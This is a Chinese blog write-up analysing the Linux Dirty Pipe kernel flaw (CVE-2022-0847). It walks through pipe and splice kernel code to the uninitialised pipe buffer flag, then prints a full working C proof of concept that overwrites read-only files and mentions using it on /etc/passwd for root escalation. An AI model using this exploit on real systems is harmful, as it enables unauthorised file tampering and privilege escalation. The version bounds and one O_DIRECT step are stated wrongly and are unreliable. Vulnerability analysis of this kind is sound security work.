在一切开始之前

file相关

文件结构体代表一个打开的文件,系统中的每个打开的文件在内核空间都有一个关联的 struct file。它由内核在打开文件时创建,并传递给在文件上进行操作的任何函数。在文件的所有实例都关闭后,内核释放这个数据结构。在内核创建和驱动源码中,struct file的指针通常被命名为file或filp。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

struct file {
union {
struct llist_node fu_llist;
struct rcu_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode; /* cached value */
const struct file_operations *f_op;

/*
* Protects f_ep, f_flags.
* Must not be taken from IRQ context.
*/
spinlock_t f_lock;
enum rw_hint f_write_hint;
atomic_long_t f_count;
unsigned int f_flags;
fmode_t f_mode;
struct mutex f_pos_lock;
loff_t f_pos;
struct fown_struct f_owner;
const struct cred *f_cred;
struct file_ra_state f_ra;

u64 f_version;
#ifdef CONFIG_SECURITY
void *f_security;
#endif
/* needed for tty driver, and maybe others */
void *private_data;

#ifdef CONFIG_EPOLL
/* Used by fs/eventpoll.c to link all the hooks to this file */
struct hlist_head *f_ep;
#endif /* #ifdef CONFIG_EPOLL */
struct address_space *f_mapping;
//指向属于文件相关的inode实例的地址空间映射,通常它设置为inode->i_mapping。在读写一个文件时,每次都从物理设备上获取文件的话,速度会很慢,在内核中对每个文件分配一个地址空间,实际上是这个文件的数据缓存区域,在读写文件时只是操作这块缓存,通过内核有相应的同步机制将脏的页写回物理设备。

errseq_t f_wb_err;
errseq_t f_sb_err; /* for syncfs */
} __randomize_layout
__attribute__((aligned(4))); /* lest something weird decides that 2 is OK */

f_mapping 字段的类型为 address_space 结构

1
2
3
4
5
6
struct address_space {
struct inode *host; /* owner: inode, block_device */
struct radix_tree_root page_tree; /* radix tree of all pages */
rwlock_t tree_lock; /* and rwlock protecting it */
...
}

address_space 结构其中的一个作用就是用于存储文件的 页缓存,下面介绍一下各个字段的作用:

  • host:指向当前 address_space 对象所属的文件 inode 对象(每个文件都使用一个 inode 对象表示)。
  • page_tree:用于存储当前文件的 页缓存
  • tree_lock:用于防止并发访问 page_tree 导致的资源竞争问题。

一个比较形象的图

img

inode ,即虚拟文件节点,VFS inode 包含文件访问权限、属主、组、大小、生成时间、访问时间、最后修改时间等信息。它是Linux 管理文件系统的最基本单位,也是文件系统连接任何子目录、文件的桥梁。 内核使用inode结构体在内核内部表示一个文件。因此,它与表示一个已经打开的文件描述符的结构体(即file 文件结构)是不同的,我们可以使用多个file 文件结构表示同一个文件的多个文件描述符,但此时,所有的这些file文件结构全部都必须只能指向一个inode结构体

管道相关

管道是Linux中IPC的常用方法,拥有一个读端和一个写端,两个程序之间可以通过这种方法实现通信。而在内核中,为了实现这种通信,需要维护一个环形缓冲区结构,即pipe_bufffer

具体的,在do_pipe()函数中 最终调用了alloc_pipe_info 来分配这种结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;


struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
//分配pipe
if (pipe == NULL)
goto out_free_uid;

if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;

user_bufs = account_pipe_buffers(user, 0, pipe_bufs);

if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
user_bufs = account_pipe_buffers(user, pipe_bufs, PIPE_MIN_DEF_BUFFERS);
pipe_bufs = PIPE_MIN_DEF_BUFFERS;
}

if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
goto out_revert_acct;

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);
//分配pipe buf
if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}
...
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#define PIPE_DEF_BUFFERS	16
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
unsigned int poll_usage;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs; //pipe buffer 数组
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

也就是说pipe 由 pipe_inode_info 结构体管理着16个pipe_buffer结构体,每个pipe_buffer结构体指向一个缓冲页,事实上,这还是一个环形的缓冲区,由head 和tail 两个指针来维护。

1-pipe_buffer

零拷贝

以socket读写为例,传统IO的执行流往往是这样

img

有两次非常多余的上下文切换操作

Linux 在 2.6.17 版本引入 splice 系统调用,不仅不需要硬件支持,还实现了两个文件描述符之间的数据零拷贝。splice 的伪代码如下:

1
splice(fd_in, off_in, fd_out, off_out, len, flags);

splice 系统调用可以在内核空间的读缓冲区(read buffer)和网络缓冲区(socket buffer)之间建立管道(pipeline),从而避免了两者之间的 CPU 拷贝操作。

img

基于 splice 系统调用的零拷贝方式,整个拷贝过程会发生 2 次上下文切换,0 次 CPU 拷贝以及 2 次 DMA 拷贝,用户程序读写数据的流程如下:

  1. 用户进程通过 splice() 函数向内核(kernel)发起系统调用,上下文从用户态(user space)切换为内核态(kernel space)。
  2. CPU 利用 DMA 控制器将数据从主存或硬盘拷贝到内核空间(kernel space)的读缓冲区(read buffer)。
  3. CPU 在内核空间的读缓冲区(read buffer)和网络缓冲区(socket buffer)之间建立管道(pipeline)。
  4. CPU 利用 DMA 控制器将数据从网络缓冲区(socket buffer)拷贝到网卡进行数据传输。
  5. 上下文从内核态(kernel space)切换回用户态(user space),splice 系统调用执行返回。

splice 拷贝方式也同样存在用户程序不能对数据进行修改的问题。除此之外,它使用了 Linux 的管道缓冲机制,可以用于任意两个文件描述符中传输数据,但是它的两个文件描述符参数中有一个必须是管道设备。

为什么是0次cpu拷贝呢,其实就是两个设备共用了同一个缓冲区,具体来讲,就是pipe_buffer所对应的page 直接指向了写文件的 page cache,这样管道读的话就是直接从page cache 读了,没有cpu拷贝操作。

函数流程分析

pipe_write()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;

/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;

__pipe_lock(pipe);

if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif

/*
* If it wasn't empty we try to merge new data into
* the last buffer.
*
* That naturally merges small writes, but it also
* page-aligns the rest of the writes for large writes
* spanning multiple pages.
*/
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
//此处相当于除以一页,chars为余数

if (chars && !was_empty) {//数据大小不是页的倍数 且当前页有剩余
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
//获取pipe的头缓冲区
int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
//设置了PIPE_BUF_FLAG_CAN_MERGE位的话
//且 剩余数据(不足一页大小的) 足以写入该页
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);
//ret返回写入数据的大小
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))//剩余写入数据大小位0 则直接返回
goto out;
}
}
//当前页没法继续写了 或者数据大小刚好是页的倍数
for (;;) {
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}

head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
//如果pipe不满 还可以继续写
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
//获取pipe头缓冲区
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
//如果缓冲区的页还未分配 则分配一个新的页
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

/*
提前在环中分配一个槽,并附加一个空缓冲区。 如果我们出错或无法使用它,要么读者会消费它,要么它仍然会在那里等待下一次写入。
*/
spin_lock_irq(&pipe->rd_wait.lock);//读者队列自旋锁

head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;//头缓冲区指向下一个缓冲区
spin_unlock_irq(&pipe->rd_wait.lock);//释放锁

/* 将page放入数组内 */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
if (is_packetized(filp))
/*
此处判断其flag是否包含O_DIRECT 漏洞点
*/

buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
//如果flag未包含O_DIRECT,则设置PIPE_BUF_FLAG_CAN_MERGE
pipe->tmp_page = NULL;

copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
//将要拷贝的数据放入当前页中
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;

if (!iov_iter_count(from))
break;
}

if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;

/* Wait for buffer space to become available. */
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
...
}
}

is_packetized()

判断flags位的 O_DIRECT

1
2
3
4
5
static inline int is_packetized(struct file *file)
{
return (file->f_flags & O_DIRECT) != 0;
}

splice()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
long do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;

if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;

ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
...
if (ipipe) {
...
}
if (opipe){
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
offset = *off_in;
} else {
offset = in->f_pos;
}

if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

ret = splice_file_to_pipe(in, opipe, &offset, len, flags);//pipe是output 进入这里
if (!off_in)
in->f_pos = offset;
else
*off_in = offset;

return ret;
}


long splice_file_to_pipe(struct file *in,
struct pipe_inode_info *opipe,
loff_t *offset,
size_t len, unsigned int flags)
{
long ret;

pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
if (!ret)
ret = do_splice_to(in, offset, opipe, len, flags);//调用
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
return ret;
}

static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
unsigned int p_space;
int ret;

if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;

/* Don't try to read more the pipe has space for. */
p_space = pipe->max_usage - pipe_occupancy(pipe->head, pipe->tail);
len = min_t(size_t, len, p_space << PAGE_SHIFT);

ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;

if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;

if (unlikely(!in->f_op->splice_read))
return warn_unsupported(in, "read");
return in->f_op->splice_read(in, ppos, pipe, len, flags);//调用read方法
}

read方法具体与文件系统有关,以ext4为例子的话就是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
const struct file_operations ext4_file_operations = {
.llseek = ext4_llseek,
.read_iter = ext4_file_read_iter,// 后面也会调用到
.write_iter = ext4_file_write_iter,
.iopoll = iocb_bio_iopoll,
.unlocked_ioctl = ext4_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = ext4_compat_ioctl,
#endif
.mmap = ext4_file_mmap,
.mmap_supported_flags = MAP_SYNC,
.open = ext4_file_open,
.release = ext4_release_file,
.fsync = ext4_sync_file,
.get_unmapped_area = thp_get_unmapped_area,
.splice_read = generic_file_splice_read,//##
.splice_write = iter_file_splice_write,
.fallocate = ext4_fallocate,
};

ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
struct iov_iter to;
struct kiocb kiocb;
unsigned int i_head;
int ret;

iov_iter_pipe(&to, READ, pipe, len);
i_head = to.head;
init_sync_kiocb(&kiocb, in);//这里把file 记录在 kiocb结构体里了,后面kiocb结构体可以视作fille,也就是被读取的普通文件
kiocb.ki_pos = *ppos;
ret = call_read_iter(in, &kiocb, &to);//调用不同文件系统定义的read iter
...
}

static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
struct inode *inode = file_inode(iocb->ki_filp);

if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
return -EIO;

if (!iov_iter_count(to))
return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
if (IS_DAX(inode))
return ext4_dax_read_iter(iocb, to);
#endif
if (iocb->ki_flags & IOCB_DIRECT)//我们不设置这个
return ext4_dio_read_iter(iocb, to);

return generic_file_read_iter(iocb, to);//进入这里
}

ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
size_t count = iov_iter_count(iter);
ssize_t retval = 0;
...
if (iocb->ki_flags & IOCB_DIRECT) {
...
/*
各种判断
*/
}
return filemap_read(iocb, iter, retval);
}

ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
ssize_t already_read)
{
struct file *filp = iocb->ki_filp;
struct file_ra_state *ra = &filp->f_ra;
struct address_space *mapping = filp->f_mapping;
struct inode *inode = mapping->host;
struct pagevec pvec;
...
do {
cond_resched();
...

error = filemap_get_pages(iocb, iter, &pvec);//这里对pvec结构体进行了初始化,如前文所说,iocb代表inputfile,这其实就是获取page cache
/*
具体的 内部调用了
struct address_space *mapping = filp->f_mapping;
filemap_get_read_batch(mapping, index, last_index, pvec);
来将pvec内的数组指向page cache
*/

for (i = 0; i < pagevec_count(&pvec); i++) {
struct page *page = pvec.pages[i];//page cache
size_t page_size = thp_size(page);
size_t offset = iocb->ki_pos & (page_size - 1);
size_t bytes = min_t(loff_t, end_offset - iocb->ki_pos,
page_size - offset);
size_t copied;
...
copied = copy_page_to_iter(page, offset, bytes, iter);//进入这里进行关联缓冲区
...
}while (iov_iter_count(iter) && iocb->ki_pos < isize && !error);
...
}

size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
size_t res = 0;
if (unlikely(!page_copy_sane(page, offset, bytes)))
return 0;
page += offset / PAGE_SIZE; // first subpage
offset %= PAGE_SIZE;
while (1) {
size_t n = __copy_page_to_iter(page, offset,
min(bytes, (size_t)PAGE_SIZE - offset), i);//封装了这个函数
res += n;
bytes -= n;
if (!bytes || !n)
break;
offset += n;
if (offset == PAGE_SIZE) {
page++;
offset = 0;
}
}
return res;
}

static size_t __copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
if (likely(iter_is_iovec(i)))
return copy_page_to_iter_iovec(page, offset, bytes, i);
if (iov_iter_is_bvec(i) || iov_iter_is_kvec(i) || iov_iter_is_xarray(i)) {
void *kaddr = kmap_local_page(page);
size_t wanted = _copy_to_iter(kaddr + offset, bytes, i);
kunmap_local(kaddr);
return wanted;
}
if (iov_iter_is_pipe(i))//我们是文件向pipe传输 故调用这里
return copy_page_to_iter_pipe(page, offset, bytes, i);
if (unlikely(iov_iter_is_discard(i))) {
if (unlikely(i->count < bytes))
bytes = i->count;
i->count -= bytes;
return bytes;
}
WARN_ON(1);
return 0;
}


pagevec结构体

管理着一个page指针数组,PAGEVEC_SIZE大小为14

1
2
3
4
5
struct pagevec {
unsigned char nr;
bool percpu_pvec_drained;
struct page *pages[PAGEVEC_SIZE];
};

最终到达copy_page_to_iter_pipe()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

if (unlikely(bytes > i->count))
bytes = i->count;

if (unlikely(!bytes))
return 0;

if (!sanity(i))
return 0;

off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];//获取头缓冲区
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);//增加该page的ref_count
/*
这里最后是调用了
static inline void page_ref_inc(struct page *page)
{
atomic_inc(&page->_refcount);
if (page_ref_tracepoint_active(page_ref_mod))
__page_ref_mod(page, 1);
}
*/


buf->page = page;
buf->offset = offset;
buf->len = bytes;
//这里是漏洞点 没有对buf->flag 初始化

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

漏洞分析

  1. 从文件到管道调用的splice()函数调用中,pipe buffer 关联page的时候没有对flag进行初始化
  2. 在调用pipe的write操作时,若我们没有设置O_DIRECT,则会设置PIPE_BUF_FLAG_CAN_MERGE
  3. 在调用pipe的write操作时,若page设置PIPE_BUF_FLAG_CAN_MERGE,且数据(不足一页大小的) 足以写入该页,则可以继续写入当前页(即上一个被写入数据的buffer),这就是所谓的MERGE操作。接下来开始对新的 buffer 进行数据写入,若没有PIPE_BUF_FLAG_CAN_MERGE 标志位则分配新页面后写入

​ 我们可以先通过设置O_DIRECT,初始化管道,并对所有管道进行读写操作,这样子就让所有pipe_biffer的page都保留了PIPE_BUF_FLAG_CAN_MERGE 标志位。

紧接着我们使用splice函数,读取任意字节(小于一页但至少一字节),使得管道pipe_buffer直接关联文件缓存页,但该函数又不对page的flag位进行任何操作。

此时我们在调用pipe的write操作,由于flag包含了PIPE_BUF_FLAG_CAN_MERGE标志,故write会对当前页,也就是splice read的文件缓存页,直接进行写入,这样我们就完成了越权写操作。

该漏洞的发现者自己公布了poc和exp,在这里放一下我复现的poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <unistd.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
int main(int argc, char** argv, char** envp) {
if (argc != 4) {
printf("Usage : %s FILEPATH EVILDATA OFFSET\n", argv[0]);
exit(1);
}
char* filename = argv[1];
char* evildata = argv[2];
long offset = strtoul(argv[3], NULL, 0);
long data_size = strlen(evildata);
long end = offset + data_size;
unsigned pipe_size;
int p[2];
if (offset < 0 || offset >= PAGE_SIZE) {
printf("[x] offset error!\n");
}
int fd = open(filename, O_RDONLY);
if (fd < 0) {
printf("[x] open failed!\n");
exit(1);
}
struct stat st;
if (fstat(fd, &st)) {
printf("[x] stat failed\n");
exit(1);
}
if (offset > st.st_size) {
printf("[x] Offset is not inside the file\n");
exit(1);
}
if (end > st.st_size) {
printf("[x] Sorry, cannot enlarge the file\n");
exit(1);
}

if (pipe(p))
exit(1);
/* initial page */
pipe_size = fcntl(p[1], F_GETPIPE_SZ);
char buf[4096];
/* fill the pipe ,set all page get PIPE_BUF_FLAG_CAN_MERGE */

for (int current_size = pipe_size; current_size > 0;) {
int nbytes = current_size > PAGE_SIZE ? PAGE_SIZE : current_size;
current_size -= write(p[1], buf, nbytes);
}

/* free the pipe,but all page remain PIPE_BUF_FLAG_CAN_MERGE */
for (int current_size = pipe_size; current_size > 0;) {
int nbytes = current_size > PAGE_SIZE ? PAGE_SIZE : current_size;
current_size -= read(p[0], buf, nbytes);
}
printf("[+] Initial pipe done!\n");

offset -= 1;
int n = splice(fd, &offset, p[1], NULL, 1, 0);
if (n == 0) {
printf("[x] splice failed!\n");
exit(1);
}
n = write(p[1], evildata, data_size);
if (n < 0) {
printf("[x] write failed!\n");
exit(1);
}
printf("[+] write done!\n");
exit(0);
}

验证:

image-20221111222643104

可以看到 ,我们确实修改了一个仅有可读权限的文件,在实际运用中,可以利用此来进行覆写/etc/passwd 从而达到提权的目的。

调试的时候

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
if (unlikely(!page_copy_sane(page, offset, bytes)))
return 0;
if (likely(iter_is_iovec(i)))
return copy_page_from_iter_iovec(page, offset, bytes, i);
if (iov_iter_is_bvec(i) || iov_iter_is_kvec(i) || iov_iter_is_xarray(i)) {
void *kaddr = kmap_local_page(page); #虚拟地址
size_t wanted = _copy_from_iter(kaddr + offset, bytes, i);
kunmap_local(kaddr);
return wanted;
}
WARN_ON(1);
return 0;
}

50d7be724a1d856240aade69e52311d

e3f56d62659f747d222b77528e5614d

影响版本以及修复

  • 8 <= Linux kernel < 5.16.11
  • 8 <= Linux kernel < 5.15.25
  • 8 <= Linux kernel < 5.10.102

修复:

copy_page_to_iter_pipe 以及 push_pipe 添加 对 buf -> flag =0 的代码即可。

参考资料

https://www.cnblogs.com/yangjiguang/p/6030423.html

https://zhuanlan.zhihu.com/p/362499466

https://cloud.tencent.com/developer/article/1922497

https://blog.csdn.net/youzhangjing_/article/details/124967518

https://cloud.tencent.com/developer/article/1848933

https://arttnba3.cn/2022/03/12/CVE-0X06-CVE-2022-0847/#pipe%EF%BC%9A%E7%AE%A1%E9%81%93

https://zhuanlan.zhihu.com/p/83398714#:~:text=%E5%9F%BA%E4%BA%8E%20splice%20%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E7%9A%84%E9%9B%B6%E6%8B%B7%E8%B4%9D%E6%96%B9%E5%BC%8F%EF%BC%8C%E6%95%B4%E4%B8%AA%E6%8B%B7%E8%B4%9D%E8%BF%87%E7%A8%8B%E4%BC%9A%E5%8F%91%E7%94%9F%202%20%E6%AC%A1%E4%B8%8A%E4%B8%8B%E6%96%87%E5%88%87%E6%8D%A2%EF%BC%8C0%20%E6%AC%A1%20CPU%20%E6%8B%B7%E8%B4%9D%E4%BB%A5%E5%8F%8A,DMA%20%E6%8E%A7%E5%88%B6%E5%99%A8%E5%B0%86%E6%95%B0%E6%8D%AE%E4%BB%8E%E4%B8%BB%E5%AD%98%E6%88%96%E7%A1%AC%E7%9B%98%E6%8B%B7%E8%B4%9D%E5%88%B0%E5%86%85%E6%A0%B8%E7%A9%BA%E9%97%B4%EF%BC%88kernel%20space%EF%BC%89%E7%9A%84%E8%AF%BB%E7%BC%93%E5%86%B2%E5%8C%BA%EF%BC%88read%20buffer%EF%BC%89%E3%80%82.%20CPU%20%E5%9C%A8%E5%86%85%E6%A0%B8%E7%A9%BA%E9%97%B4%E7%9A%84%E8%AF%BB%E7%BC%93%E5%86%B2%E5%8C%BA%EF%BC%88read%20buffer%EF%BC%89%E5%92%8C%E7%BD%91%E7%BB%9C%E7%BC%93%E5%86%B2%E5%8C%BA%EF%BC%88socket%20buffer%EF%BC%89%E4%B9%8B%E9%97%B4%E5%BB%BA%E7%AB%8B%E7%AE%A1%E9%81%93%EF%BC%88pipeline%EF%BC%89%E3%80%82.